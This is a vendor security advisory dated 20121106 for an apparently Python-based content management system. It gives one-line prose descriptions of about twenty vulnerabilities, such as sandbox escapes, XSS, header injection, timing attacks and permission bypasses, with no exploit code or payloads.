Security vulnerability announcement: 20121106 - Multiple vectors
Restricted Python injection
Anonymous users can cause an arbitrary Python statement to be run when the admin interface is accessed. No breakout of the in-built Python sandbox is possible, but it will run with the privileges of that admin user.
Reflexive HTTP header injection
A crafted URL can contain arbitrary HTTP headers that are then returned to the user. Can be used to log users out, for example.
Restricted Python sandbox escape
Accidental exposure of the sandbox whitelisting function when imported from a certain, nonstandard location.
Partial restricted Python sandbox escape
Incomplete security declarations on certain objects allow permission checking to be bypassed on some functions.
Reflexive XSS
Crafted URL allows a passed full response body (or a redirect target) to be returned by accidental exposure of internal methods of the response file handle on a URL.
Partial permissions bypass
Can be used to access a subset of attributes of unpublished content items through a crafted URL, if that content's path is known
Restricted Python sandbox escape
Escape from sandbox through a utility function not checking that it has valid inputs, allowing access to the trusted builtins
Reflexive XSS
Utility function is callable directly through a crafted URL and accepts a default value.
Anonymous users can list user account names
A method of the membership database is insufficiently protected, allowing users who do not have permission to enumerate users to do so through a crafted URL
Partial denial of service through Collections functionality
This DoS causes large amounts of IO and cache churn, meaning it can be used to DoS a site if accessed repeatedly
Anonymous users can batch change titles of content items
The batch id change script does not correctly handle anonymous users attempting to change titles but leaving the ids the same correctly. Allows anonymous users to craft a POST request (once they've found a valid CSRF token) to change content titles arbitrarily.
Crafted URL allows downloading of BLOBs that are not visible to the user
BLOBs stored on custom content types can be accessed through a non-standard URL, bypassing the declared permission check
Persistent XSS via filtering bypass
HTML content crafted by users may allow execution of arbitrary javascript on specific browsers.
Users connected through FTP can list hidden folder contents
Users can read the contents of folders (but not access the files themselves) that they would otherwise be unable to access.
Persistent XSS
Crafted URLs allow arbitrary strings (including full HTML) to be stored in memory against a key, that can then be read out again on a related URL.
Attempting to access a view with no name returns an internal data structure
Some types of URL can be ambiguous, the unambiguous form allows anonymous views. On some content types an anonymous view lookup returns a private data structure, which under certain circumstances may be used to read out confidential data.
DoS through RSS on private folder
A specially crafted URL invoking the RSS feed for a folder the user doesn't have access to (but knows the path of) can cause an infinite loop, trying up a server thread.
Timing attack in password validation
The equality test in our authentication system is not constant time, allowing a user with a sufficiently stable, fast connection to the server to check hash prefixes
PRNG isn't reseeded
We are using a Python random (seeded via system random), not system random, which in a long running process means it isn't reseeded. In addition, our error pages leak random numbers, allowing the state of the PRNG used for password resets to be derived.
Form detail exposure
A vulnerability in z3c.form that leaks default values of form fields through crafted URLs.
